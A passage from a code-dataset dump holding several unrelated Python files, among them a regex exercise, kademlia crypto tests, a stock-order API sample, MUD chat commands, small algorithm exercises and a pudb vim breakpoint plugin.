'epsilon':\n return Epsilon.getERE()\n elif erlist in symbols:\n return Symbol.getERE(erlist)\n elif not erlist:\n return\n else:\n raise ValueError('Either you have used a symbol not tied to event, or epsilon/empty is misspelled')\n #recursively parse out parenthesis. Combine with function above to save computation, but doesn't probably matter much for initial time difference\n @staticmethod\n def parse(expr):\n def _helper(iter):\n items = []\n for item in iter:\n if item == '(':\n result, closeparen = _helper(iter)\n if not closeparen:\n raise ValueError(\"bad expression -- unbalanced parentheses\")\n items.append(result)\n elif item == ')':\n return items, True\n else:\n items.append(item)\n return items, False\n\n return _helper(iter(expr))[0]\n\n","sub_path":"EREMachine/EREParser.py","file_name":"EREParser.py","file_ext":"py","file_size_in_byte":4873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"544159196","text":"import urllib.request\r\nimport json\r\nimport pprint\r\n\r\nobj = { 'Password': '123456',\r\n 'Symbol': '8001',\r\n 'Exchange': 1,\r\n 'SecurityType': 1,\r\n 'FrontOrderType': 10,\r\n 'TimeInForce': 0,\r\n 'Side': '2',\r\n 'CashMargin': 1,\r\n 'MarginTradeType': 1,\r\n 'DelivType': 2,\r\n 'FundType': 'AA',\r\n 'AccountType': 2,\r\n 'Qty': 100,\r\n 'ClosePositionOrder': 1,\r\n 'ClosePositions': None,\r\n 'Price': 0,\r\n 'ExpireDay': 20200717 }\r\njson_data = json.dumps(obj).encode('utf-8')\r\n\r\nurl = 'http://localhost:18080/kabusapi/sendorder'\r\nreq = urllib.request.Request(url, json_data, method='POST')\r\nreq.add_header('Content-Type', 'application/json')\r\nreq.add_header('X-API-KEY', 'e629f7e6073b40488d0d134dae4e60ac')\r\n\r\ntry:\r\n with urllib.request.urlopen(req) as res:\r\n print(res.status, res.reason)\r\n for header in res.getheaders():\r\n print(header)\r\n print()\r\n content = json.loads(res.read())\r\n pprint.pprint(content)\r\nexcept urllib.error.HTTPError as e:\r\n print(e)\r\n content = json.loads(e.read())\r\n pprint.pprint(content)\r\nexcept Exception as e:\r\n print(e)\r\n","sub_path":"sample/Python/kabusapi_sendorder.py","file_name":"kabusapi_sendorder.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"453331179","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Auteur(s) : Dylan DE MIRANDA (dylandemiranda@gmail.com) & Alexy DA CRUZ (adacruz@geomtech.fr)\n# Version : 0.2\n# Date : 28/04/2021\n# Thème du script : Exo 2\n\nimport argparse\nimport re\n\n\ndef au_revoir():\n \"\"\"\n affiche 3 sauts de ligne et Fin du programme\n Entrées : aucune\n Sortie : aucune\n \"\"\"\n print(\"\\n\\n\\nAu revoir\\n\\nFin du programme\")\n\n\ndef afficheTitre(titre: str, titreRapport: bool = False):\n \"\"\"\n génère un titre pour chaque étape ou pour le rapport avec une ligne d'étoiles\n avant et après de la longueur du titre\n Entrées : \n titre : titre de l'étape ou du rapport\n titreRapport : par défaut sur false, true si il s'agit du titre principal pour le rapport\n Sorties : \n retourne une chaine de caractère avec le titre et les étoiles ainsi\n qu'un saut de ligne si il s'agit du titre du rapport\n \"\"\"\n # Récupère la longueur du titre (nombre de caractères)\n longueurTitre = len(titre)\n # Génère un string contenant le bon nombre d'étoiles\n etoiles = \"*\"*longueurTitre\n # Génère le string contenant le titre et les étoiles\n renduTitre = etoiles + \"\\n\" + titre + \"\\n\" + etoiles + 
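`EREMachine.parse` above turns a flat token list into nested lists by recursing on `(` and returning on `)`; the key detail is that every recursion level shares one iterator, so a child call consumes exactly its own parenthesized span. A standalone run, reusing the tokenizer pattern from the record's `self.t`:

```python
import re

# Same token pattern as self.t in the EREMachine record above.
TOKEN_RE = r"\(|\)|\~|\&|\||\*|\+|epsilon|\^|empty|\w+"

def parse(tokens):
    def _helper(it):
        items = []
        for item in it:
            if item == "(":
                result, closed = _helper(it)  # same iterator: child eats its span
                if not closed:
                    raise ValueError("bad expression -- unbalanced parentheses")
                items.append(result)
            elif item == ")":
                return items, True
            else:
                items.append(item)
        return items, False
    return _helper(iter(tokens))[0]

tokens = re.findall(TOKEN_RE, "~(open + close)* | epsilon")
print(tokens)        # ['~', '(', 'open', '+', 'close', ')', '*', '|', 'epsilon']
print(parse(tokens)) # ['~', ['open', '+', 'close'], '*', '|', 'epsilon']
```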
\"\\n\"\n\n # Retourne le string généré\n return renduTitre\n\n\ndef afficheLignes(regex: str, lignes: list):\n \"\"\"\n génère une liste des lignes trouvées par rapport aux regex appliqués\n Entrées :\n regex : filtre regex à appliquer sur la ligne\n Sorties :\n retourne une liste contenant les lignes trouvées par rapport aux regex appliqués \n \"\"\"\n renduLignes = \"\"\n lignesTrouvees = []\n\n # Pour chaque ligne du fichier\n for ligne in lignes:\n # On test le regex sur la ligne\n if re.search(regex, ligne):\n # Si ça match dans la ligne, on l'ajoute à la liste des lignes trouvées\n lignesTrouvees.append(ligne)\n\n # pour chaque ligne trouvée\n for ligne in lignesTrouvees:\n # On les ajoutes à la suite dans une chaine de caractères\n renduLignes = renduLignes + ligne\n\n # On ajoute ensuite le compte de lignes trouvées pour l'étape dans le rapport\n renduLignes = renduLignes + \"*\"*5 + \" \" + str(len(lignesTrouvees)) + \" lignes trouvees \" + \"*\"*5 + \"\\n\\n\"\n\n # On retourne la liste contenant les lignées trouvées\n return renduLignes\n\ndef GenererFichier(nomFichier, sortieFichier):\n \"\"\"\n prend le fichier de base et applique des filtres regex\n sur chaque ligne et sort un fichier de sortie en tant\n que rapport sur les filtres regex appliqués\n Entrées :\n nomFichier : nom du fichier de base dans lequel appliquer les filtres regex\n sortieFichier : fichier dans lequel écrire le rapport\n Sorties : aucune\n \"\"\"\n\n # Liste contenant les regex à appliquer sur chaque ligne\n regexList = [\n r'[A-Z0-9]', # 1.a: lignes contenant des chiffres ou des majuscules\n r'\\.', # 1.b: lignes contenant des points\n r'\\.\\.\\.', # 1.c: lignes contenant trois points\n r'(\\s|)([0-9A-Fa-f])+(\\s)', # 1.d: lignes contenant des nombres hexadecimaux separes par des blancs\n r'(\\s)*(([0-9A-Z])|([0-9a-z])){12,}(\\s)*', # 1.e: lignes contenant un mot d'au moins 12 caracteres alphanumeriques\n r'^(([^a]*?)(a)([^a]*?)){5}$', # 1.f: lignes contenant exactement 5 lettres a(pas nécessairement successives)\n r'[\\[|\\]]', # 1.g: lignes contenant des crochets(] ou[)\n r'^((a+)|( ))', # 1.h: lignes ne contenant que des lettres a et des espaces\n r'(([0-9]+)(\\.)([0-9]+)(\\.)([0-9]+)(\\.)([0-9]+))', # 1.i: lignes contenant quelque chose qui ressemble a une adresse IP\n r'^\\n$', # 2.a: lignes vides\n r'^(\\s)+\\n$', # 2.b: lignes blanches\n r'.', # 2.c: lignes non vides\n r'^((?!a).)*$', # 3.a: lignes qui ne contiennent pas de a\n r'^((?! ).)*$', # 3.b: lignes qui ne contiennent pas des espaces\n r'^((?![0-9]+).)*$', # 3.c: lignes qui ne contiennent pas des chiffres décimaux\n r'^(([0-9]{2})(\\ )([0-9]{2})(\\ )([0-9]{2})(\\ )([0-9]{2})(\\ )([0-9]{2}))', # 4: lignes qui débutent par un numéro de téléphone au format 01 23 45 67 89\n r'^(([0-9]{2})(\\ |\\-|\\.)([0-9]{2})(\\ |\\-|\\.)([0-9]{2})(\\ |\\-|\\.)([0-9]{2})(\\ |\\-|\\.)([0-9]{2}))', # 5: idem 4 mais on peut avoir . ou - a la place des espaces\n r'^(([0]|\\(0\\))([0-9]{1})(\\ |\\-|\\.)([0-9]{2})(\\ |\\-|\\.)([0-9]{2})(\\ |\\-|\\.)([0-9]{2})(\\ |\\-|\\.)([0-9]{2}))', # 6: idem 5 mais le 0 peut être entoure de parentheses\n r'(([0]|\\(0\\))(\\ |\\-|\\.)([0-9]{3})(\\ |\\-|\\.)([0-9]{3})(\\ |\\-|\\.)([0-9]{3}))$' # 7: terminent par un tel au format 0 123 456 789, espaces, - ou . 
et(0\n ]\n\n # Liste des titres de chaque étape du rapport\n titreList = [\n \"1.a: lignes contenant des chiffres ou des majuscules\",\n \"1.b: lignes contenant des points\",\n \"1.c: lignes contenant trois points\",\n \"1.d: lignes contenant des nombres hexadecimaux separes par des blancs\",\n \"1.e: lignes contenant un mot d'au moins 12 caracteres alphanumeriques\",\n \"1.f: lignes contenant exactement 5 lettres a(pas nécessairement successives)\",\n \"1.g: lignes contenant des crochets(] ou[)\",\n \"1.h: lignes ne contenant que des lettres a et des espaces\",\n \"1.i: lignes contenant quelque chose qui ressemble a une adresse IP\",\n \"2.a: lignes vides\",\n \"2.b: lignes blanches\",\n \"2.c: lignes non vides\",\n \"3.a: lignes qui ne contiennent pas de a\",\n \"3.b: lignes qui ne contiennent pas des espaces\",\n \"3.c: lignes qui ne contiennent pas des chiffres décimaux\",\n \"4: lignes qui débutent par un numéro de téléphone au format 01 23 45 67 89\",\n \"5: idem 4 mais on peut avoir . ou - a la place des espaces\",\n \"6: idem 5 mais le 0 peut être entoure de parentheses\",\n \"7: terminent par un tel au format 0 123 456 789, espaces, - ou . et(0)\"\n ]\n\n # Titre du rapport\n sortieFichier.write(afficheTitre(\"PYTHON : Fichier de sortie de l'exercice 2 du TP4\"))\n\n # Pour chaque regex qui se trouve dans la liste\n for i in range(0, len(regexList)):\n # On ouvre le fichier de base en lecture\n entreFichier = open(nomFichier, 'r')\n # On écrit dans le fichier de sortie le titre de l'étape du rapport\n sortieFichier.write(afficheTitre(titreList[i]))\n # On écrit dans le fichier de sortie le rendu appliqué après le filtre regex\n sortieFichier.write(afficheLignes(regexList[i], entreFichier))\n # On ferme le fichier\n entreFichier.close()\n\n\n################################################\n########## PROGRAMME PRINCIPAL ################\n################################################\n\ndef main():\n # Parsing des arguments lancé dans le CLI\n parser = argparse.ArgumentParser()\n\n # Argument pour le nom du fichier à parser\n parser.add_argument(\"filename\", help=\"Nom du fichier à parser.\", type=str)\n parser.add_argument(\"output\", help=\"Nom du fichier de sortie pour les résultats de parsing.\", type=str)\n\n args = parser.parse_args()\n\n # Assignation de la valeur de l'argument filename\n filename = args.filename\n output = args.output\n\n # Ouvre le fichier de sortie en écriture\n outputFichier = open(output, 'w')\n # Appel de la fonction GenererFichier en renseignant le nom du fichier de base et en mettant l'objet file pour le fichier de sortie\n GenererFichier(filename, outputFichier)\n # Fermeture du fichier de sortie\n outputFichier.close()\n\n\nif __name__ == \"__main__\":\n main() # Appel de notre fonction principale\n au_revoir() # Appel de notre fonction pour quitter le programme\n","sub_path":"Leçon 8/TP8_Exo2_v2.py","file_name":"TP8_Exo2_v2.py","file_ext":"py","file_size_in_byte":7726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"448029853","text":"import unittest\n\nfrom kademlia.crypto import Crypto\nfrom kademlia.domain.domain import PublicKey, PersistMode\nfrom kademlia.utils import digest\n\n\nclass CryptoTests(unittest.TestCase):\n\n def setUp(self):\n self.crypto = Crypto()\n\n def test_get_signature(self):\n \"\"\"\n get_signature should return signature for specified value and private key\n \"\"\"\n priv_key = 'b22c8ea30609663197550b010e7abf5a9726523e8ca7ffdfb6a102815d3c8e97'\n tgs_sign = 
'd83c0713135d774afda7df23e8c45d4456f0e7cfbea92824b8980d2d6934b16f5e7b665e95cfd7d7ec2eddcd9c5ca7e2c0e257df01817033bc0f2aab2ce7bab2'\n value_1 = b'test value'\n\n signature_1 = self.crypto.get_signature(value_1, priv_key).hex()\n self.assertEqual(signature_1, tgs_sign)\n\n def test_check_signature(self):\n \"\"\"\n check_signature should validate signature\n \"\"\"\n public_key = '0224d2079e86e937224f08aa37a857ca6116546868edde549d0bd6b8536af9d554'\n tcs_sig = '749625f8d70efae75ffd4a62e22c6534b2cbaa49212c454e6cfb7c5215e39ef01d0388999b2d38a24ad379245e1b4c69b9259b1c8c86bb011712999b4565192d'\n value = digest('some_key').hex() + 'some_data' + str(None) + str(PersistMode.SECURED)\n\n self.assertTrue(self.crypto.check_signature(digest(value), tcs_sig, public_key))\n\n\nclass PublicKeyTests(unittest.TestCase):\n\n def test__init__(self):\n \"\"\"\n __init__ should set initial values for key and exp_time\n \"\"\"\n public_key = PublicKey('test key')\n self.assertEqual(public_key.key, 'test key')\n self.assertIsNone(public_key.exp_time)\n public_key = PublicKey('test key', 123)\n self.assertEqual(public_key.exp_time, 123)\n\n def test_createKey_validFormat_ok(self):\n \"\"\"\n key.set should check type and set key\n \"\"\"\n public_key = PublicKey('test key')\n public_key.key = 'another key'\n self.assertEqual(public_key.key, 'another key')\n\n def test_createKey_invalidFormat_errorRaises(self):\n \"\"\"\n key.set should check type and raise exception in case of invalid format\n \"\"\"\n\n self.assertRaises(AssertionError, lambda: PublicKey(None))\n self.assertRaises(AssertionError, lambda: PublicKey(123))\n\n def test_of_json(self):\n \"\"\"\n of_json should set key and exp_time from json\n \"\"\"\n json = dict()\n json2 = dict()\n json['key'] = 'test key'\n json['exp_time'] = 123\n public_key = PublicKey.of_json(json)\n self.assertEqual(public_key.key, 'test key')\n self.assertEqual(public_key.exp_time, 123)\n self.assertRaises(AssertionError, lambda: PublicKey.of_json(json2))","sub_path":"kademlia/tests/test_crypto.py","file_name":"test_crypto.py","file_ext":"py","file_size_in_byte":2693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"343644122","text":"def insert_sort(array):\n for i in range(0, len(array)):\n k = array[i]\n j = i\n while j > 0 and array[j-1] > k:\n array[j] = array[j-1]\n j -= 1\n array[j] = k\n return array\n\nimport random\nl = [5, 5, 0, 6, 4, 6, 1, 6, 7, 4]\nprint(insert_sort(l))\nprint(insert_sort([random.randint(0, 10) for i in range(10)]))\n","sub_path":"Algorithms/InsertSort.py","file_name":"InsertSort.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"432263836","text":"import sys\n\nlst = []\nfor line in sys.stdin:\n if line.strip()=='':\n break\n lst.append(line)\n\nnumber = int(lst[0])\n\ncount = 0\nbegin = 1\nwhile count < number:\n lineNumber = int(lst[begin])\n if lineNumber < 3:\n print(0)\n begin += 2\n count += 1\n continue\n length = []\n i = 0\n while i < len(lst[begin+1]):\n str = ''\n if lst[begin+1][i]>='0' and lst[begin+1][i]<='9':\n str += lst[begin+1][i]\n if i==len(lst[begin+1])-1:\n length.append(int(str))\n break\n while lst[begin+1][i+1]>='0' and lst[begin+1][i+1]<='9':\n str += lst[begin+1][i+1]\n i += 1\n if i == len(lst[begin + 1]) - 1:\n break\n length.append(int(str))\n i += 1\n\n triangles = 0\n for i in range(0,lineNumber-2):\n for j in range(i+1,lineNumber-1):\n for h in 
range(j+1,lineNumber):\n                judge = True\n                if (length[i]+length[j] <= length[h]) or (length[i]+length[h] <= length[j]) or (length[j]+length[h] <= length[i]):\n                    judge = False  # every pair of sides must sum above the third to form a triangle\n                if judge:\n                    triangles += 1\n    print(triangles)\n    begin += 2\n    count += 1\n\nimport numpy as np\nfrom sklearn.metrics import accuracy_score, f1_score, precision_score, recall_score\n\n# X: array whose first column is the SVP label score and remaining columns are CNN class scores\nsvp_labels = (X[:, 0] > 0.5).astype(int)\nCNN_pred = (np.argmax(X[:, 1:], axis=1) > 0).astype(int)\n\nprint(len(svp_labels))\nprint(\"accuracy: \", accuracy_score(svp_labels, CNN_pred))\nprint(\"precision: \", precision_score(svp_labels, CNN_pred))\nprint(\"recall: \", recall_score(svp_labels, CNN_pred))\nprint(\"f1: \", f1_score(svp_labels, CNN_pred))\n\n","sub_path":"evaluation/svplaudit_agreement.py","file_name":"svplaudit_agreement.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"89174398","text":"from functions import addToScheduler\nfrom functions import getFreeKey\nfrom copy import deepcopy\nimport time\n\n'''\nCommand function template:\n\ndef atcommandname(params, mud, playersDB, players, rooms, npcsDB, npcs, itemsDB, items, envDB, env, eventDB, eventSchedule, id, fights, corpses):\n\tprint(\"I'm in!\")\n'''\ndef sendAtCommandError(params, mud, playersDB, players, rooms, npcsDB, npcs, itemsDB, items, envDB, env, eventDB, eventSchedule, id, fights, corpses):\n\tmud.send_message(id, \"Unknown @command \" + str(params) + \"!\")\n\ndef quit(params, mud, playersDB, players, rooms, npcsDB, npcs, itemsDB, items, envDB, env, eventDB, eventSchedule, id, fights, corpses):\n\tmud._handle_disconnect(id)\n\ndef who(params, mud, playersDB, players, rooms, npcsDB, npcs, itemsDB, items, envDB, env, eventDB, eventSchedule, id, fights, corpses):\n\tcounter = 1\n\tif players[id]['permissionLevel'] == 0:\n\t\tfor p in players:\n\t\t\tif players[p]['name'] == None:\n\t\t\t\tname = \"None\"\n\t\t\telse:\n\t\t\t\tname = players[p]['name']\n\t\t\t\t\n\t\t\tif players[p]['room'] == None:\n\t\t\t\troom = \"None\"\n\t\t\telse:\n\t\t\t\troom = players[p]['room']\n\n\t\t\tmud.send_message(id, str(counter) + \". Client ID: [\" + str(p) + \"] Player name: [\" + name + \"] Room: [\" + room + \"]\")\n\t\t\tcounter += 1\n\telse:\n\t\tmud.send_message(id, \"You do not have permission to do this.\")\n\ndef subscribe(params, mud, playersDB, players, rooms, npcsDB, npcs, itemsDB, items, envDB, env, eventDB, eventSchedule, id, fights, corpses):\n\t# print(\"Subbing to a channel\")\n\tparams = params.replace(\" \", \"\")\n\tif len(params) > 0:\n\t\tif str(params.lower()) in players[id]['channels']:\n\t\t\tmud.send_message(id, \"You are already subscribed to [\" + params.lower() + \"]\")\n\t\telse:\n\t\t\tplayers[id]['channels'].append(str(params.lower()))\n\t\t\tmud.send_message(id, \"You have subscribed to [\" + params + \"]\")\n\telse:\n\t\tmud.send_message(id, \"What channel would you like to subscribe to?\")\n\ndef unsubscribe(params, mud, playersDB, players, rooms, npcsDB, npcs, itemsDB, items, envDB, env, eventDB, eventSchedule, id, fights, corpses):\n\t# print(\"Un-Subbing from a channel\")\n\tparams = params.replace(\" \", \"\")\n\tif len(params) > 0:\n\t\ttry:\n\t\t\tplayers[id]['channels'].remove(params.lower())\n\t\t\tmud.send_message(id, \"You have unsubscribed from [\" + params.lower() + \"]\")\n\t\texcept Exception as e:\n\t\t\tmud.send_message(id, \"You are not currently subscribed to [\" + params.lower() + \"]\")\n\telse:\n\t\tmud.send_message(id, \"What channel would you like to unsubscribe from?\")\n\t\n\tif params.lower() == \"system\":\n\t\tmud.send_message(id, \"You have un-subscribed from a SYSTEM channel. From now on, you will not receive any game-wide system messages (including server reboot notifications etc.). 
You can subscribe to SYSTEM at any time by typing '@subscribe system'\")\n\ndef channels(params, mud, playersDB, players, rooms, npcsDB, npcs, itemsDB, items, envDB, env, eventDB, eventSchedule, id, fights, corpses):\n\tif len(players[id]['channels']):\n\t\tmud.send_message(id, \"You are currently subscribed to the following channels:\")\n\t\t# print(players[id]['channels'])\n\t\tfor c in players[id]['channels']:\n\t\t\tmud.send_message(id, \"[\" + c + \"]\")\n\telse:\n\t\tmud.send_message(id, \"You are not currently subscribed to any channels.\")\n\ndef runAtCommand(command, params, mud, playersDB, players, rooms, npcsDB, npcs, itemsDB, items, envDB, env, eventDB, eventSchedule, id, fights, corpses):\n\tswitcher = {\n\t\t\"sendAtCommandError\": sendAtCommandError,\n\t\t\"quit\": quit,\n\t\t\"subscribe\": subscribe,\n\t\t\"unsubscribe\": unsubscribe,\n\t\t\"channels\": channels,\n\t\t\"who\": who,\n\t}\n\n\ttry:\n\t\tswitcher[command](params, mud, playersDB, players, rooms, npcsDB, npcs, itemsDB, items, envDB, env, eventDB, eventSchedule, id, fights, corpses)\n\texcept Exception as e:\n\t\tswitcher[\"sendAtCommandError\"](e, mud, playersDB, players, rooms, npcsDB, npcs, itemsDB, items, envDB, env, eventDB, eventSchedule, id, fights, corpses)\n","sub_path":"atcommands.py","file_name":"atcommands.py","file_ext":"py","file_size_in_byte":3851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"58570495","text":"\"\"\"\n@author: Milena Bajic (DTU Compute)\n\"\"\"\n\nimport sys, os, argparse\nimport pandas as pd\nfrom utils.data_loaders import *\nfrom utils.plotting import *\nfrom utils.matching import *\nimport json\n\n#=================================#\n# SETTINGS\n#=================================#\n# Script arguments\nparser = argparse.ArgumentParser(description='Please provide command line arguments.')\n\nparser.add_argument('--route', default= \"CPH1_VH\", help='Process all trips on this route, given in json file.')\nparser.add_argument('--trips', nargs='+', type=int, help='Process those trips. If not passed, the trips in the json file for the selected route will be processed.')\nparser.add_argument('--p79', action='store_true', help = 'If this is p79 data, pass true.')\nparser.add_argument('--aran', action='store_true', help = 'If this is aran data, pass true.')\nparser.add_argument('--json', default= \"json/routes.json\", help='Json file with route information.')\nparser.add_argument('--out_dir', default= \"data\", help='Output directory.')\nparser.add_argument('--recreate', action='store_true', help = 'Recreate files, even if present. If False and files are present, the data will be loaded from them.') \n\n# Parse arguments\nargs = parser.parse_args()\nroute = args.route\ntrips = args.trips\nis_p79 = args.p79\nis_aran = args.aran\njson_file = args.json\nout_dir = args.out_dir\nrecreate = args.recreate\n#=================================\n# P79 or ARAN?\nif not is_p79 and not is_aran:\n print('No data type set. 
Choose p79 or aran.')\n    sys.exit(0)\n    \nif is_p79 and is_aran:\n    print('Choose either p79 or aran, not both at the same time.')\n    sys.exit(0)\n    \n# Create output directory for this route\nif is_p79:\n    out_dir_route = '{0}/P79_processesed_data/{1}'.format(out_dir, route)\nelif is_aran:\n    out_dir_route = '{0}/ARAN_processesed_data/{1}'.format(out_dir, route)\nif not os.path.exists(out_dir_route):\n    os.makedirs(out_dir_route)\n\n# Create output directory for route plots\nout_dir_plots = '{0}/plots'.format(out_dir_route)\nif not os.path.exists(out_dir_plots):\n    os.makedirs(out_dir_plots)\n \n \n# Use all selected trips or the ones in the json file\nif trips: \n    trips_thisroute = trips\nelse:\n    # Load json file\n    with open(json_file, \"r\") as f:\n        route_data = json.load(f)\n    if is_p79:\n        trips_thisroute = route_data[route]['P79_trips']\n    elif is_aran:\n        trips_thisroute = route_data[route]['ARAN_trips'] \n    \n    \nif not trips_thisroute:\n    print('No trips set.')\n    sys.exit(0)\n    \n# Process trips\nfor trip in trips_thisroute:\n    \n    # Load data\n    DRD_data, iri, DRD_trips = load_DRD_data(trip, is_p79 = is_p79, is_ARAN = is_aran) \n    \n    # Map match \n    file_suff = 'P79_route-{0}_taskid-{1}_full'.format(route, trip)\n    full_filename = '{0}/map_matched_data{1}.pickle'.format(out_dir_route, file_suff)\n    print(full_filename)\n    \n    if os.path.exists(full_filename):\n        map_matched_data = pd.read_pickle(full_filename)\n    \n    else:\n        if is_aran:\n            DRD_data.dropna(subset=['lat','lon'], inplace=True) \n            map_matched_data = map_match_gps_data(gps_data = DRD_data, is_GM = False, out_dir = out_dir_route , out_file_suff = file_suff, recreate = recreate)\n        else:\n            map_matched_data = map_match_gps_data(gps_data = iri, is_GM = False, out_dir = out_dir_route , out_file_suff = file_suff, recreate = recreate)\n    \n    plot_geolocation(map_matched_data['lon_map'], map_matched_data['lat_map'], name = 'DRD_{0}_GPS_mapmatched_gpspoints'.format(trip), out_dir = out_dir_plots, plot_firstlast = 1000, recreate = True)","sub_path":"prepare_DRD.py","file_name":"prepare_DRD.py","file_ext":"py","file_size_in_byte":3627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"622935845","text":"class Solution(object):\n\n    def countComponents(self, n, edges):\n        p = list(range(n))  # parent table; list() so it is assignable under Python 3\n        def find(v):\n            print(p)\n            if p[v] != v:\n                p[v] = find(p[v])  # path compression\n            return p[v]\n\n        for e in edges:\n            v, w = map(find, e)\n            p[v] = w\n            if v != w:\n                n -= 1  # each union of distinct roots merges two components\n        print(n)\n        return n\n\nn = 5\nedges = [[0, 1], [1, 2], [2, 3], [3, 4]]\n\nSolution().countComponents(n,edges)","sub_path":"UnionFind.py","file_name":"UnionFind.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"314354903","text":"lis=[\"abc\",\"aba\",\"abcba\",\"wc\"]\nc=0\nfor i in range(len(lis)):\n    st=list(lis[i])\n    if(len(st)>2):\n        if(st[0]==st[len(st)-1]):\n            c=c+1\nprint(c)\n","sub_path":"stringcount.py","file_name":"stringcount.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"339357850","text":"from math import sqrt\ndef prime(n):\n    if n == 1:\n        return False\n    else:\n        for i in range(2, int(sqrt(n))+1):\n            if n % i == 0:\n                return False\n        return True\nm, n = map(int, input().split())\nfor i in range(m, n+1):\n    if prime(i):\n        
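        # print every prime in the inclusive range [m, n]; prime() trial-divides up to sqrt(n)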
print(i)\n","sub_path":"1929.py","file_name":"1929.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"561407998","text":"class Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n\n\nclass List:\n def __init__(self):\n self.head = None\n self.__size = 0\n\n def empty(self):\n return self.head is None if True else False\n\n def size(self):\n return self.__size\n\n def push_back(self, value):\n new_node = Node(value)\n if not self.empty():\n node = self.head\n while node.next is not None:\n node = node.next\n node.next = new_node\n else:\n self.head = new_node\n self.__size += 1\n\n def pop_back(self):\n if self.size() is 0:\n return\n elif self.size() is 1:\n self.head = None\n self.__size -= 1\n else:\n node = self.head\n while node.next.next is not None:\n node = node.next\n node.next = None\n self.__size -= 1\n\n def insert(self, index, value):\n new_node = Node(value)\n if index is 0:\n new_node.next = self.head\n self.head = new_node\n self.__size += 1\n elif self.size() - 1 >= index:\n node = self.head\n while index - 1 is not 0:\n node = node.next\n index -= 1\n new_node.next = node.next\n node.next = new_node\n self.__size += 1\n elif self.size() is index:\n self.push_back(value)\n\n def erase(self, index):\n if not self.empty():\n if index is 0:\n self.head = self.head.next\n self.__size -= 1\n elif self.size() - 1 > index:\n node = self.head\n while index - 1 is not 0:\n node = node.next\n index -= 1\n temp = node.next.next\n node.next = temp\n self.__size -= 1\n elif self.size() - 1 is index:\n self.pop_back()\n\n\nif __name__ == \"__main__\":\n _list = List()\n\n _list.push_back(0)\n _list.push_back(1)\n _list.push_back(2)\n _list.push_back(3)\n _list.push_back(4)\n _list.push_back(5)\n _list.push_back(6)\n _list.push_back(7)\n\n _list.pop_back()\n _list.pop_back()\n\n _list.insert(0, 100)\n _list.erase(0)\n\n _list.insert(6, 200)\n _list.erase(6)\n\n _list.insert(2, 300)\n _list.erase(2)\n","sub_path":"2. 
Single Linked List/code/SingleLinkedList.py","file_name":"SingleLinkedList.py","file_ext":"py","file_size_in_byte":2406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"544940813","text":"# vim: tw=79\nimport vim\n\nfrom bdb import Breakpoint\nfrom itertools import starmap\nfrom linecache import checkcache\nfrom pudb.settings import load_breakpoints, save_breakpoints\nfrom pudb import NUM_VERSION\n\nLOAD_ARGS = () if NUM_VERSION >= (2013, 1) else (None,)\n\n\ndef breakpoints():\n \"\"\"\n :return: An iterator over the saved breakpoints.\n :rtype: starmap(Breakpoint)\n \"\"\"\n return starmap(Breakpoint, load_breakpoints(*LOAD_ARGS))\n\n\ndef breakpoint_dict():\n \"\"\"\n :return: The saved breakpoints, as a dict with (filename, line number) keys\n :rtype: dict(tuple(str, int), Breakpoint)\n \"\"\"\n return {(bp.file, bp.line): bp for bp in breakpoints()}\n\n\ndef breakpoint_strings(empty_cond_str=''):\n \"\"\"\n :return: An generator over the saved breakpoints as strings in the format:\n \"filename:linenr:condition\"\n :rtype: generator(str)\n \"\"\"\n return (\n '{file}:{line:d}:{cond}'.format(\n file=bp.file,\n line=bp.line,\n cond=bp.cond if bp.cond else empty_cond_str)\n for bp in breakpoints()\n )\n\n\ndef update_breakpoints():\n vim.eval('sign_unplace(g:pudb_sign_group)')\n for bp in breakpoints():\n try:\n opts = ('{\"lnum\": %d, \"priority\": %d}'\n % (bp.line, vim.vars['pudb_priority']))\n\n # Critical to use vim.eval here instead of vim.vars[] to get sign\n # group, since vim.vars[] will render the string as\n # \"b'pudb_sign_group'\" instead of \"pudb_sign_group\"\n vim.eval('sign_place(0, \"%s\", \"PudbBreakPoint\", \"%s\", %s)'\n '' % (vim.eval('g:pudb_sign_group'), bp.file, opts))\n except vim.error:\n # Buffer for the given file isn't loaded.\n continue\n\n\ndef current_position():\n \"\"\"\n :return: a filename, line number pair, to be used as a key for a\n breakpoint.\n :rtype: tuple(str, int)\n \"\"\"\n filename = vim.current.buffer.name\n row, _ = vim.current.window.cursor\n return (filename, row)\n\n\ndef toggle_breakpoint():\n \"\"\"\n Toggles a breakpoint on the current line.\n \"\"\"\n bps = breakpoint_dict()\n bp_key = current_position()\n\n if bp_key in bps:\n bps.pop(bp_key)\n else:\n bps[bp_key] = Breakpoint(*bp_key)\n\n save_breakpoints(bps.values())\n update_breakpoints()\n\n\ndef edit_breakpoint():\n \"\"\"\n Edit the condition of a breakpoint on the current line.\n If no such breakpoint exists, creates one.\n \"\"\"\n bps = breakpoint_dict()\n bp_key = current_position()\n\n if bp_key not in bps:\n bps[bp_key] = Breakpoint(*bp_key)\n bp = bps[bp_key]\n\n old_cond = '' if bp.cond is None else bp.cond\n vim.command('echo \"Current condition: %s\"' % old_cond)\n vim.command('echohl Question')\n vim.eval('inputsave()')\n bp.cond = 